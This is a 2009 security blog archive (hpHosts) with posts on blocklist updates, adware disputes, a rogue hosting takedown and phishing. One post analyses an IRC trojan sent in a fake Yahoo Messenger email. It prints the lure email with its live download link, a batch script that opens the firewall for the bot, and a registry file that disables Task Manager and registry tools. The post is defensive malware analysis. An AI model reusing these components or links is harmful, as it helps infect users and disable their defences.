Blog for hpHosts, and whatever else I feel like writing about ....

Thursday, 30 April 2009

hpHosts: New feature for you :o)

I am happy to announce, there is now a new feature for you ladies and gents to play with;

http://hosts-file.net/?s=History

This option is listed under the menu as "History", and in short, provides basically, the same as the "Browse Database", with one exception - it lists ALL IP changes that have been recorded, for all hosts, regardless of whether or not the host is listed in the hpHosts database.

I was hoping to have introduced this last week, but am still fighting off an infection, so things are going alot slower than I'd like.

In any case, have a play and let me know what you think.

Spambot Search Tool v0.29 - Recommended update

I was notified earlier of a bug in the sGB service, that prevented everyone posting comments to the guestbooks. A little checking showed the issue to actually be caused by a bug in the Spambot Search Tool, used to filter and block spammers.

This issue has now been fixed, and v0.29 released as a recommended update.

As an aside, I've also updated the System Requirements page for this product.

Homepage
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Download
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Wednesday, 29 April 2009

Opera: 15 years old!

I never used to use Opera until it stopped being adware, and since then, have become somewhat of a fan of it (though I still don't use it full time as it doesn't use the MenuExt reg key, so doesn't support my AB Extension Pack).

It is with great pleasure therefor, that I announce Opera's 15th anniversary. Opera is without a doubt, one of the best browsers available, beating the pants off of Firefox, Chrome, IE and just about everything else.

Happy birthday Opera - and here's to many more!

Celebrating 15 years of browser innovation
http://www.opera.com/portal/15/

Cloud Antivirus - Yay or nay?

Panda have never been very good when it came to non-bloat and moreso when it came to having good detections. Now however, Panda are offering a beta of their "Cloud Antivirus", could this spell an end to the bloat, and finally a major upgrade to their detection rate? Time will tell.

Here's my first bit of feedback after visiting the website they've dedicated to it though - GET RID OF THE DAMN JAVASCRIPT REQUIREMENT!. Contrary to popular belief, some of us prefer to have this disabled, and a security company should be advocating keeping it disabled, instead of making the site utterly useless until it is enabled (not even the feedback option works!).

Server based antivirus is actually nothing new, contrary to their claims - most corporate networks already have something similar, which consists of a server that hosts the bulk of the antivirus, and the client, which simply have a client that checks the server for updates, configuration settings and what not. However, aslong as they drastically improve their detection rates, this could actually be something useful, again - time will tell.

In the meantime, if you like beta testing, then give it a run and let us know how it does.

Homepage:
www.cloudantivirus.com

Blog
http://research.pandasecurity.com/archive/Panda-Cloud-Antivirus-_2D00_-Free-AV-thin_2D00_client.aspx

Kudos to Donna at Calendar of Updates, for the heads up :o)

/edit

Oh how I must laugh - thin client? the download is 18MB! (and that's just the installer!)

Zlkon.lv disconnected - but apparently not completely gone

I was happy to read over at Malware Domain List this morning, that Zlkon.lv had apparently been disconnected. Obviously I had to see where the domains listed in hpHosts, that pointed to zlkon, had now gone to. The results were interesting, but we'll get to that in a second.

I checked the AS report, as referenced in the MDL thread, and indeed it did seem as though Zlkon had gone;

http://www.cidr-report.org/cgi-bin/as-report?as=AS12553

Checking via BGPlay for the dates 28-04-2009 - 29-04-2009 shows;



This shows their upstream as;

http://www.cidr-report.org/cgi-bin/as-report?as=AS5518

If we expand the dates a little, we see that indeed, alot of the previous routes seem to have now gone as of 06:42 yesterday;







As mentioned, I ran the domains listed in hpHosts, that previously resolved to Zlkon.lv IP space, to see where they now resolved to, and the results showed;

95.129.144.210 - NET-VENTREX (UK)
88.80.19.237 - SE-PRQ-20051124 (Sweden)
91.212.65.35 - EUROHOST-NET (Ukraine)
78.26.179.253 - RENOME-SERVICE (Ukraine)
78.129.192.17 - RapidSwitch (UK)
78.129.166.5 - RapidSwitch (Cayman Islands)
77.222.40.234 - SpaceWeb (Russia)
64.191.12.38 - Zlathosting.ru (US)
213.163.91.93 - SERVERBOOST (Netherlands)
211.95.73.189 - UNICOM (China)
203.169.164.18 - HKNET-H (Hong Kong)
195.88.81.37 - ECOWEB (Latvia)
194.247.192.180 - EUNET-YU (Serbia)

Interestingly however, quite a few of them are still resolving to the Zlkon IP space, and are seemingly still active. Meaning either Zlkon is still in the process of being taken down, or has found a new upstream provider already.

See the full results, as of two hours ago;

http://hosts-file.net/misc/zlkon.lv.html

I'm surprised somewhat, that the mainstream tech media hasn't already picked this up, but alas it seems this is certainly the case (or at least, if they have, I've not seen any stories concerning it on any of the RSS feeds I monitor).

Either way, this is great news for us, and is hopefully an end to what is without doubt, one of the worst offenders in the world of malware.

If you've got something to add, or just fancy joining in the discussion, feel free to join us over at the MDL forums;

http://www.malwaredomainlist.com/forums

Tuesday, 28 April 2009

BitDefender joins the list of companies not to trust .....

Stupid question I know, it's all about the money - but what ever happened to security products err, protecting users instead of selling them out?

http://msmvps.com/blogs/donna/archive/2009/04/28/bitdefender-partners-with-ask-com-also.aspx

hpHosts mirror and vURL Online bug fix

I'm happy to announce, courtesy of the wonderful ladies and gents at CoU (Calendar of Updates), we've now got an additional download mirror for the hpHosts files.

I am planning on converting the entire site to MySQL/PHP, so it can be moved to a Linux host, but that's going to take some time due to health and personal issues.

As an aside, I was made aware a couple of days ago, about a problem with the Montana Menagerie server that is used by vURL Online. It turns out the URL it had been given, was using a redirect, so the server failed to return the results. I've now changed it to the correct URL so this issue is now resolved.

If you'd like to help spread vURL, by providing a proxy mirror for use by the service, the script is now available at;

http://vurl.mysteryfcm.co.uk/?mode=FAQ#vurlhelp

All your server needs is PHP + cURL!

StopBadware delists Ascentive (y'know, the folks responsible for FinallyFast)

From the desk of "wtf are they smoking down there", comes yet another completely stupid move by StopBadware;

StopBadware.org delists Ascentive as Badware
http://msmvps.com/blogs/donna/archive/2009/04/28/stopbadware-org-delists-ascentive-as-badware.aspx

Wonder who they'll delist next? Zango? Zlkon? or all of the loverly botnets perhaps?

Sunday, 26 April 2009

YouTube promoting Zango via mygamesfile.com!

I already knew Zango weren't gone for good, contrary to popular belief, as ZangoCash (a favourite amongst the PPI (pay per install) crowd) is still very much online. However, I wasn't expecting this;

http://www.malwaredomainlist.com/forums/index.php?topic=2777



As shown by JohnC (Malware Domain List), this clearly shows Zango being peddled courtesy of a video on YouTube, that's been posted by mygamesfile.com (congrats to those running MGF - you've now been added to hpHosts - we don't like malware, which is exactly what Zango is).

Is this a one off? I doubt it, is YouTube directly involved? I doubt it - but it shows yet again that sites that allow user content to go unchecked, is always going to lead to trouble.

References

YouTube Promotes Zango Software
http://www.malwaredomainlist.com/forums/index.php?topic=2777

ZANGO-R.I.P.----FINALLY!!!
http://temerc.com/forums/viewtopic.php?p=3437553#p3437553

Notorious adware vendor Zango shuts its doors
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9131858&intsrc=news_ts_head

You Get What You Pay For
http://blog.spywareguide.com/2009/04/you-get-what-you-pay-for.html

Zango installers pushed via Twitter
http://blog.spywareguide.com/2009/04/zango-installers-pushed-via-tw.html

Download Zango, Get Free PC Games (Sort Of)
http://blog.spywareguide.com/2009/02/download-zango-get-free-pc-gam.html

Lots more Zango beatdown goodness by The Goddamn Batman
http://blog.spywareguide.com/mt-search.cgi?tag=Zango&blog_id=4&IncludeBlogs=4

Softpedia delisted Comodo

This is indeed happy news, even if it wasn't their choice. Alas Comodo don't seem to understand the concept of adware/spyware, so lets spell it out for them - ASK IS SPYWARE, SAFE SURF IS ADWARE! (and trying to bully those that let others know about this, isn't going to win you any points, quite the opposite).

Well, if you had searched Softpedia for Comodo in the past week, you would have surely noticed that the company’s flagship programs were no longer listed on Softpedia. This was not our decision, of course, but let’s start with the beginning.

On April, 15th, Softpedia received an official cease and desist letter from the Comodo PR team requesting us to "discontinue all references on Softpedia identifying CIS as adware" within seven days, because Comodo Internet Security is not adware.

The first thing we did was, of course, to double-check the license, but, as we’ve tried explaining to the Comodo team, CIS is indeed adware. Why? Well, for starters, because the installer attempts to change both the browser’s homepage and search engine. As if that wasn’t a good enough reason, the setup also offers to install SafeSurf. Here’s what the official Comodo letter states: "SafeSurf is optional and does not display unsolicited advertisements on a user’s computer, nor does it hijack browser settings or perform search overriding or home page changing without the user’s consent."

Aside from the fact that SafeSurf is a component that the program (CIS) does not require to fully function, therefore it alone would be a good reason to mark CIS as adware, this utility also installs Ask Toolbar without asking for the user’s permission. This type of behavior is clearly not the one described in the Comodo email and could be easily classified as spyware (since adware would imply prior user consent).

And so, after double-checking the award, we’ve replied to the Comodo email and tried explaining all of the above. Moreover, we’ve reminded them of the program’s popularity on Softpedia and its high rating from both users and our reviewers. And last, but not least, before requesting a confirmation email, we’ve underlined the fact that changing the adware components in the setup process from checked-by-default to unchecked will solve the problem without removing them from the installation.

We’ve also posted our email on Comodo’s community forums, explaining our actions to the software’s users and, because we would prefer to keep CIS on Softpedia, we’ve even offered options to the PR team. As expected, most Comodo users shared our view and disapproved of the inclusion of the components in question.

Unfortunately, neither we nor the community seem to have had any influence of the Comodo team. A week later nothing changed and, as our deadline was near and the Comodo PR team did not send us any reply to our email, we’ve decided we had no other option but to the remove the listing.


http://news.softpedia.com/news/Comodo-Software-Removed-From-Softpedia-110169.shtml

Augnitum offering (limited) Outpost for free

Yep, you read right, it's limited, as shown by the comparison. However, Outpost is still one of the best Windows firewalls available, and beats the pants off of the built in firewall that Windows comes with, so grab it asap.

http://download.cnet.com/Agnitum-Outpost-Firewall/3000-10435_4-10913746.html

The official page for it is at the following URL, but none of the download links/buttons worked when I tried it.

http://free.agnitum.com/

Kudos to Donna @ CoU for the heads up who says;

It’s been years since Agnitum is offering free version of their firewall but it never has program update. Today, I learn in Outpost and Wilders discussion forums that Agnitum is offering the 2009 edition of Outpost firewall for free. It’s a simple but effective firewall. No web control. Just a firewall, self-protection and Host Protection.


http://msmvps.com/blogs/donna/archive/2009/04/26/nice-move-agnitum-for-providing-new-version-of-your-free-firewall.aspx?CommentPosted=true#commentmessage

Saturday, 25 April 2009

Full Circle Magazine: Issue 24

Full Circle - the independent magazine for the Ubuntu Linux community
are proud to announce the release of our twenty-fourth issue.

This month: It's our birthday!

... and a redesign! *gasp!*

* Command and Conquer - Cron.
* How-To : Program in C - Part 8, Create a MAME Machine,
and Spreading Ubuntu - Part 3 and Inkscape - Part 1.
* My Story - Great-grandma Goes Shopping and Chinese Translations
* Book Review - Ubuntu Unleashed, three copies up for grabs!
* MOTU Interview - James Westby
* Top 10 - Best of Top5, 2007-'09
* PLUS: all the usual goodness, doubled!

Read more
http://fullcirclemagazine.org/2009/04/25/full-circle-magazine-issue-24-released-to-an-unsuspecting-public/

Get it while it's hot!
http://fullcirclemagazine.org/issue-24/

Issues 0 - Current
http://fullcirclemagazine.org/downloads/

Forums:
http://ubuntuforums.org/forumdisplay.php?f=270

Wiki:
http://wiki.ubuntu.com/UbuntuMagazine

Friday, 24 April 2009

Email Alert: IRC Trojan disguised as Yahoo Messenger Beta 9.4

I received the following e-mail a few minutes ago;

Yahoo! Messenger <http://messenger.yahoo.com>

Preview the new
Yahoo! Messenger for Vista™


The new messenger Vista 9.3 now works on Windows XP too. Download Now <http://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe>

Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <http://new.groups.yahoo.com/ymessenger_for_vista/join>

We need your help to improve the product.
» Send feedback <http://feedback.help.yahoo.com/feedback.php?.src=MSNGRVISTA&.from=web>
See Yahoo! Messenger for Vista in action.
» Watch the video preview

Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).

See what's in store...

* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling

©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.

Copyright © 2008 Yahoo! Inc. <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=0/SIG=10np9vmbm/*http://www.yahoo.com/> All rights reserved. Privacy Policy <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=1/SIG=11b8diacl/*http://privacy.yahoo.com/privacy/us/mesg/> - Terms of Service <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=2/SIG=1136qnvkg/*http://docs.yahoo.com/info/terms/> - Copyright/IP Policy <http://us.ard.yahoo.com/SIG=14t> - Help <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=4/SIG=119174mfa/*http://help.yahoo.com/help/us/messenger>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13ulcavcq%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d431143132%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=129gtep8a%2fN%3dy0jjD9j8a4Q-%2fC%3d-1%2fD%3dFSRVY%2fB%3d-1>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13upbop04%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d671435333%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=139fpoc2d%2fN%3dyUjjD9j8a4Q-%2fC%3d224039.2026165.3499947.1964914%2fD%3dFOOT%2fB%3d1058397>


The link it points to for the download;

hxxp://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe

.. leads to an IP in China. If we scan the file with VirusTotal, we see it's an IRC trojan.

http://www.virustotal.com/analisis/a9e91000bd66003d3871e28c92b51a3b

Extracting the file, shows it claiming to be a .DLL by the name of fp721ext.dll. This DLL however, is actually a folder, and contains the files shown in the following screenshot;



As you can see, there are quite a few in there. mIRC itself, a legit IRC client, has been renamed mircrosoft.exe. The folder also contains a file called csc.cmd. Amongst other things, this adds an exception to the Windows firewall, to allow mircrosoft.exe to connect without warning you, to the attackers IRC channel;

@echo off

@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg

@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"

@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE

@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe

EXIT


regis.reg contains the following;

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a

[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1201460626,0"

[HKEY_CURRENT_USER\Software\mIRC\License]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"

[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"

[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001


anyssya.jpg actually is a JPG file, and it's detection at VT is non-existent. However, since it's also loaded by the csc.cmd file, I'm betting it's a little more than it seems.

The infection, judging by the .ini files, seems to connect to 89.35.207.106 (client-8935207106.raknetsoft.ro).

I'll post further analysis once complete. In the meantime, the e-mail itself originated from 66.51.252.238 (Velcom (ADSL) NET-VELCOM-DSL-1) and had the following properties;

From: Yahoo! Vista
E-mail:vista-yahoo.com@trixbox1.localdomain [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !

members.freewebs.com added to hpHosts

Whilst normally free hosting services are not included, I've decided to include members.freewebs.com in hpHosts. The reason for this is that their mail processor (members.freewebs.com/formMail.jsp) is being used in a rash of Citibank phishing scams, and reports to them concerning this, have gone completely ignored.



Until they lock down their form processor to prevent this, I felt it best to blacklist them.

Phishtank submission:
http://www.phishtank.com/phish_detail.php?phish_id=689769

Incidentally, anyone else notice that PhishTank has started including legit links when submitting phishing e-mails to them? (*.abbeynational.co.uk, *.citibank.com etc etc) I thought it was meant to be parsing those out .... certainly used to.

http://www.phishtank.com/user.php?username=mysteryfcm

NOD32 flagging hpHosts as Win32/Qhost trojan

I noticed this myself yesterday whilst working on an update, and just ignored it. However, a little looking up has shown the following;

http://www.wilderssecurity.com/showthread.php?p=1453375

I've checked it again now that NOD has updated, and the F/P has thankfully been corrected. I am however, a little confused as to why blocking ThePirateBay.org, would result in NOD thinking the hpHosts file was a trojan .....

Incidentally, I've had queries before concerning torrent sites being listed in hpHosts, and as I've said before, whilst there are legit uses for torrents (e.g. Linux distros), the vast majority of torrents that I've come across, have been malware. Until the ladies and gents that run these types of sites, start removing those infected with malware, the sites will remain in hpHosts.

Jackass of the week

... and the award for jackass of the week goes to;

http://spywarewarrior.com/viewtopic.php?t=30667

Thursday, 23 April 2009

The BillP WinPatrol Story

As a member of the security community I’ve had the honor to work with volunteers who spend countless hours helping users decipher hijack logs. I’ve as the pleasure of sharing data with AntiSpyware crusaders who pour over millions of bytes of captured data proving how reputable companies were encouraging invasive adware popups. I’ve reverse engineered malware attacks tracing their roots to countries whose governments turn a blind eye to criminal activities. I’ve been threaten, received cease & desist orders from lawyers and offered big bucks to join the dark side.

I’m now happy to write and share my experience with others. I hope that my insights into the ever changing consumer technology industry may be valuable to others and encourage their thoughts and imagination. I don’t expect everyone to agree with everything I write, but I continue to consider myself lucky if I can spark new innovative thoughts from my readers.


Read the full article
http://billpstudios.blogspot.com/2009/04/billp-winpatrol-story.html

Hexzone, RansomWare and, Finjan

Hexzone coincidentally caught my attention while I was gathering material for my recent article about some emerging ransomware. Hexzone has recently been seen downloading Trojan.Ransomlock, which blocks the user's access to all Windows resources and asks the victim for money (ransom) in return for unlocking their system. For details please refer to Ransomware on the loose..





In this post, I will try to shed light on some missing details about Hexzone. Then I will show Hexzone's relationship with some other known malware, and in the end I will discuss my thoughts on the size of this un-named botnet.

Here is my initial analysis of the Hexzone sample mentioned in Finjan's report. Normally Hexzone resides on the victim machine in the form of a 'Browser Helper Object'. The reason it injects itself into the browser as a plug-in is to hijack the user's browsing sessions in order to blackmail them. Here is how it happens, as the user tries to browse any web page from the infected PC, this plug-in leads the user to a fake page, displaying porn contents. Along with porn contents a message is displayed in the Russian language.

Translated from Russian:

"to delete (porn contents) select country and sends code 3981134 to room number (different for each country)."

As I explained in my last article, these SMS codes use paid "rooms". These "rooms" have a concept like 1900 numbers where it costs money to phone in. Every time someone sends an SMS to one of these rooms, a fixed amount of money is deducted from the sender's balance and it gets transferred to the owner of the room.

Another shocking fact was that this page listed seven country names along with corresponding SMS room numbers. Our initial observation that this SMS based ransom is only being used within Russia no longer holds true.


Read the full article
http://blog.fireeye.com/research/2009/04/hexzone-ransomware-and-finjan.html

Wednesday, 22 April 2009

Spambot Search Tool v0.28

Version: 0.28

* Fixed MySQL database/tables/fields not created
* Fixed sPHPAPI missing $ in a couple places

Special thanks to DrDrrae (www.drdrrae.com)

Download:
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Saturday, 18 April 2009

hpHOSTS - UPDATED April 18th, 2009

hpHOSTS - UPDATED April 18th, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 60,302 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 18/04/2009 13:19
  2. Last Verified: 18/04/2009 12:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Thursday, 16 April 2009

sGB Update: Dutch translation added!

I am happy to report, with special thanks to Joris, the sGB site can now be viewed in Dutch by your guestbooks visitors. As an example;

http://guestbook.it-mate.co.uk/users/MysteryFCM/?lng=1

You can change the language via the top right hand corner. If you'd like to help me add additional translations, please do contact me!.

Saturday, 11 April 2009

SupportOnClick update

I'm happy to report, we've now more chance of reaching and warning alot more people about this scam, as The Register has picked this up!.

In addition, some more digging has revealed a couple more of their domains. Namely;

supportonclick.co.uk
supportonclick.net
concernforcalcutta.org (registered via DirectI)

References

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

New scam - They call you by phone!
http://www.malwarebytes.org/forums/index.php?showtopic=11156

Staffordshire Council - Telephone computer support warning (PDF)
http://www.staffordshire.gov.uk/NR/rdonlyres/6997DBB0-E31E-4AFB-A886-C9DDEE114204/90090/TelephoneComputerSupportWarning.pdf

Bigpond and Supportonclick??
http://forums.whirlpool.net.au/forum-replies-archive.cfm/1057308.html

Cold call scam warns of virus infection
http://www.h-online.com/security/Cold-call-scam-warns-of-virus-infection--/news/112893

Fake tech support call scam - prefetch virus logmein123.com
http://www.digitaltoast.co.uk/fake-tech-support-call-scam-prefetch-virus-logmein123com

Friday, 10 April 2009

hpHosts Online update: .tv WhoIs support fixed

I didn't realise I'd forgotten to add support for .tv domains to the WhoIs routine until I was checking a domain suspected of phishing.

I've now fixed this, so .tv domains will now display the correct WhoIs results. For example;

http://hosts-file.net/?s=aktenzeichen-xy.tv&wn=1

If you find any other TLD's not showing the correct WhoIs results, please do let me know.

/edit

I've fixed it for .at domains too :o)

Bill P, author of WinPatrol, recognized by Upload.com (aka Download.com)

I received the latest upload.com newsletter a few minutes ago, and was pleased to see the following (re-formatted for readability);

BillP, also known as the developer of WinPatrol

Bill Pytlovany Bill Pytlovany has been through a lot during his career, which includes being one of the original developers of AOL as well as being the brain behind a live simul-chat with Michael Jackson and AOL members. MTV eventually adopted this technology for video chats and called it MTC's Yak Chat. BillP also took part in creating a real-time game play on the Internet that would sync up with Sunday and Monday Night Football and College Bowl games. Today, this kind of technology seem ancient since we now have the capability to watch live TV on our mobile phones, but back in the 90's, it was unheard of!

As passionate as he was about all of these fun projects that came his way, he found his "It" project when he developed a program to help his family and friends prevent spyware programs from taking over their computers. Long before the terms anti-spyware and anti-virus became household names, WinPatrol soon became BillP's biggest passion to fight for internet safety.

Today, WinPatrol is available in 13 different languages with the help of volunteers on the localization effort and has gone through some 16 different versions. WinPatrol has created a devoted following and has its own group on Facebook and Twitter, with BillP being acknowledged most recently by Microsoft as one of the Microsoft's Most Valuable Professionals.

Congrats, BillP!


Read the rest of the newsletter
http://nl.com.com/view_online_newsletter.jsp?list_id=e482

I've been a fan of Bill's ever since I first came across WinPatrol several years ago, and am proud to call him a friend. The amount of selfless work he devotes to helping the community is astounding. So here's to you Bill, recognition is well over due!.

Hosted javascript leading to .cn PDF malware

Unfortunately such subject lines are all so common. However, lets work through this one together to show an excellent tool, and a common source.

Steve Burn over at it-mate.co.uk submitted an investigation they had been running into a number of sites hosted by a single hosting provider being compromised and leading to malware.

So, lets look at a few examples:

Firstly, just a simple proof that the exploit is still in place, lets look at :

hxxp://www.adammcgrath.ca (216.97.237.30 - Whois : OrgName: Lunar Pages)

If you simply curl, or wget, the home page of this site, you'll get


Read the full article
http://isc2.sans.org/diary.html?storyid=6178

Trial-Pay: A free subscription is NOT as free as you think!

I've been seeing these Trial Pay options for a while now, for the likes of Avira etc. I've always been skeptical of these, and always recommended people stay away from them (if you don't want to pay for a licence to use a program, don't use the program - there are almost always free alternatives). Sadly, people still believe Trial Pay are going to give you a free subscription to something - this is simply NOT TRUE.

In the vast majority of cases, you have to either PURCHASE or REGISTER for something in order to get this "free" licence. As I've said many times before, if you've got to pay or register for something - IT IS NOT FREE!.

Don't believe me? Check their terms of service, specifically;

Completing a TrialPay Checkout and Offer
a. In order to successfully complete the TrialPay checkout and receive your product, you must initiate the completion of the third-party offer ("advertiser offer") from within the TrialPay checkout. Any transactions (offer completions) initiated directly on the third-party website without originating from within the TrialPay checkout will not be tracked by our advertising partners and you will not be credited for your product/service.


Still don't believe me? See what my friend Donna has to say;

http://www.calendarofupdates.com/updates/calendar54718

Thursday, 9 April 2009

Black Hat SEO and Rogue Antivirus p.7

The Finjan's Malicious Code Research Center has made a nice report about the business with rogue antivirus software (redirecting visitors from legitimate Web sites). Zdnet Article

The article can be found in the latest Cybercrime Intelligence Report

--------------------------------------------------------------------------------
I just want to show you some script added on legit websites and the log we've found on the criminal web server.

Note that for each site on this blog like goscanfuse.com, scan6lite.com, scan7new.com, every domain is listed in the Google API "Safe Browsing" and each of them reveal a lot of information. eg. the number on domain used (compromised) and other in conjunctions.

--------------------------------------------------------------------------------

We start by a Google Safe Browsing Diagnostic for: scanline6.com


Read more
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p7.html

HostExploit and Directi: Actions against registry services abuse – Report April 2009

Registrar Abuse
  1. 8,506 domain names have been suspended that were either involved in abusive activity or registered by customers/registrants exhibiting persistent patterns of abuse.
  2. These domain names (and/or their registrants) were involved in various types of abuse, such as spamming, phishing/spoofing, malware perpetration, child pornography, financial frauds and falsified ‘Whois’ information.
  3. All other services utilized by any of these domain names have also been revoked.
Analysis

When suspending domain names on receiving complaints about their involvement in abuse, HostExploit is pleased to report that, Directi, while reviewing the complaints over the past few months, found certain trends:
  1. Domain names registered with the same/similar contact information (name, address patterns)
  2. Bulk registrations of domain names with a slight variation in the domain name e.g. 2008bases1.net, 2008bases2.net, 2008bases3.net, 2008bases4.net, 2008bases5.net …. by abusive registrants/customers
  3. Same blacklisted name servers being repeatedly utilized.
  4. Registrations in the same customer account involved in various forms of abuse
  5. Based on these, we reviewed all domain names, first in the customer's account, then in the reseller's account and then across the databases.
An active list of directly suspended domains is available for down load from HostExploit.com


Read the full article:
http://hostexploit.com/index.php?option=com_content&view=article&id=124:actions-against-registry-services-abuse-report-april-2009-hostexploit-and-directi&catid=4:hostexploit-news

Wednesday, 8 April 2009

PCButts still causing a ruckus ....

PCButts (aka Christopher Butts) has been known for years for both stealing other people's software and claiming it as his own, and for claiming to be a Microsoft MVP, when he isn't (if you are in doubt about this claim, contact Microsoft themselves - they'll confirm this). A whole slew of us have been monitoring him for years to see what he's up to, and the latest ruckus he's caused, which to his credit, is the one thing he can do all by his lonesome, is most certainly nothing new.

Alas the reason people keep helping him cause a comotion by responding to him, is because he continues peddling the stuff he's stolen, to those in need of REAL help (aka, help from those both qualified to do so, and capable of doing such without stealing other people's work).

"PA Bear", who actually IS a Microsoft MVP, wrote the following in one of the Microsoft newsgroups, to allow quick and simple clarification of the facts surrounding PCButts;

Stop talking to yourself!

What's the "real truth" about pcbutts1? Read on...


. Is he an MS MVP? No!
cf. http://mvp.support.microsoft.com/communities/mvp.aspx

. Are his downloads safe? No!
cf. http://msmvps.com/blogs/hostsnews/archive/2009/02/25/1673723.aspx

. If xxx.ms-mvp.org redirects to xxx.pcbutts1.com, why doesn't he post that
link to begin with?


. Is he a proven thief? Yes!
cf.
http://msmvps.com/blogs/hostsnews/archive/2006/11/10/pcbutts1-_2E00__2E00_.-the-saga-continues-_2E00__2E00__2E00_.aspx
cf.
http://groups.google.com/group/microsoft.public.security.homeusers/msg/213247814fb4d61e
cf.
http://groups.google.com/group/microsoft.public.security.homeusers/msg/e19fce884897662f


. What do real experts have to say about him? It ain't pretty.
cf. http://www.siteadvisor.com/sites/pcbutts1.com (Reviews)


. Does he have all his marbles?
cf. http://en.wikinews.org/wiki/NASA_van_rolls_off_California_mountain


Ignore this MVP imposter!


http://groups.google.co.uk/group/microsoft.public.windowsxp.general/msg/04e0992669fe4ee1?hl=en

References:

hpHosts Blog: PCButts now serving malware via ms-mvp.org
http://hphosts.blogspot.com/2009/02/pcbutts-now-serving-malware-via-ms.html

PCButts - Internet Software Thief
http://temerc.blogspot.com/2006/09/pcbutts-internet-software-thief.html

PCButts - Coward Behind The Curtain
http://temerc.blogspot.com/2007/01/pcbutts-coward-behind-curtain.html

TeMerc Real MVP vs. PCButts Fake MVP
http://www.temerc.com/forums/viewtopic.php?f=25&t=2665

BugHunter - Info on PCButts
http://bughunter.it-mate.co.uk/pcbutts.txt

Plagiarism and intellectual theft...
http://msmvps.com/blogs/spywaresucks/archive/2006/11/10/272921.aspx

I ain't happy about this.....
http://msmvps.com/blogs/spywaresucks/archive/tags/I+ain_2700_t+happy+about+this_2E00__2E00__2E00__2E00__2E00_/default.aspx?PageIndex=2

I do believe PCBUTTS1 has finally lost the plot
http://msmvps.com/blogs/spywaresucks/archive/2006/09/08/I-do-believe-PCBUTTS1-has-finally-lost-the-plot.aspx

PCButts1 - The Saga Continues
http://msmvps.com/blogs/hostsnews/archive/2006/11/10/pcbutts1-_2E00__2E00_.-the-saga-continues-_2E00__2E00__2E00_.aspx

WinPatrol 16.0.2009.1

16.0.2009.1

Changes only affect Vista and Windows 7 users
Improved HOSTs change detection in Vista
Fixed Exit dialog (if checked) when switching to UAC mode.
Remove redunant switching to UAC mode dialog. All versions

AutoUpdate and UAC change detected included in Option with HOST file changes


Changelog
http://www.winpatrol.com/upgrade.html

Download
http://www.winpatrol.com/download.html

Bits from Bill
http://billpstudios.blogspot.com

Hat tip to CoU for the heads up

